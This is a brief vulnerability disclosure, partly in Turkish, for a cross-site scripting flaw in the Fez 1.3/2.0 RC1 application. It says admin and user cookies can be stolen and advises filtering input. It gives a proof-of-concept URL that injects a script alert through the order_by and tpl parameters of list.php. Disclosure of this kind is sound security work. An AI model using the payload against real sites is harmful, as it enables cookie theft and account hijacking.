< ------------------- header data start ------------------- >

#############################################################

# Application Name : Fez 1.3/2.0 RC1

# Vulnerable Type : Cross Site Scripting

# Infection : Yönetici ve User cookieleri çalinabilir.

# Bug Fix Advice : Zararli kodlar filtrelenmelidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/list.php?terms=CaspeR&order_by=><script>alert(’asd’)</script>&tpl=><script>alert(’asd’)</script>

< -- bug code end of -- >